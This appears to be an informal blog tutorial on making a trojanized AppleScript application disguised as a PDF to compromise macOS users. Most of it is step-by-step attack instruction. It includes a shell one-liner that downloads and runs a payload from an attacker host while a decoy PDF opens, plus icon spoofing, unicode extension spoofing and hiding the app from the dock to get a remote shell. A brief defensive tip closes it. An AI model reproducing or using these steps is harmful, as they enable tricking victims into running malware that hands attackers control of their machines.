Sooo, today we're gonna poke some fun at Apple, and we're gonna do that by making af trojanized PDF file.
For this to work, you'll need some kind of payload, it could be a simple netcat, or an implant from a C2 system, I let you decide that :)
But, for this to work, you'll need a Kali system, running C2, Apache and a Mac running OSX.
So, the idea we're gonna play with, is getting the victim to download an Applescript that mimics a PDF. But, to keep our victim from wondering to much, we're actually gonna load a real pdf file for him / her to read, while we're doing stuff in the background.
First, find a pdf file, and import it into GIMP, and choose the first page. The idea is that this file is gonna be used for the icon, so it needs to be a perfect square. To do this go to image >> Canvas size, and set it to be the same height and width, to get a perfect square.
After that, go to tools >>transform tools, select image and click "Align center".
Now, you should have the image perfectly aligned in the center, so now we need to set the icon size. Apple needs it to be 256 x 256 pixels, so "image" >> "scale image", and set width and height to 256 pixel. Export this to png format, and let's continue to make an icon file for mac.
https://cloudconvert.com/png-to-icns
Convert the file to icns format, and save it.
Now, generate an implant, and copy the real pdf file onto a folder in apache, along with the icon file, and the front-cover.png file. Import the front-cover.png and icns file to the Mac, and let's move on.
ON THE MAC, Open the script editor, and make a new script.
do shell script "curl -g http://ATTACKER-IP-ADDRESS/book.pdf | open -f -a Preview.app &;curl -g http://ATTACKER-IP-ADDRESS/payload_file >> /tmp;cd /tmp;chmod +x payload_file;./payload_file"This is an example script, adjust for your own needs and current situation. When you have something that works, save it / export it as the type "Application".
Now, on the script file, rightclick, and choose "Get Info", and drag the icns file into the window, where the icon is, to change the icon on the script file.
Now, the problem is that OSX will say it's an app file, an application, so we need to spoof the ending, and we can use unicode for that. So go look at the list, and choose one for your current setup, and rename the file.https://en.wikipedia.org/wiki/List_of_Unicode_characters.
But wait, there's more. Because we need to hide it in the dock, so how do we do that ? We do a right-click on the application file, and choose "Show package contents". Under "Contents", there's a file called info.plist, open it, and inset this into it.
<key>NSUIElement</key>
<string>1</string>That's it. Try to double-click it, and see if it loads. If it did work, you should have a windows open with the pdf, and get a connect shell from the payload. Now, there's a problem with all of this, and that is that the payload is veeeery easy to catch if the user's just a bit informed. Simply list process with
ps
#OR To identify a known process, eg IMPRESS
ps aux | grep IMPRESSRemember this is just a concept. For this to work, you would need some kind of privs escalation method, and a process hiding rootkit that works under MacOS.
But, what to do to protect from this ? In "Finder", enable "Show all filename extensions", and DONT doubleclick files, and when you open unknown files, list running processes before and after, and check if something dials out to an unknown location / server.
So, have fun with Applescript, it's really worth looking into it :)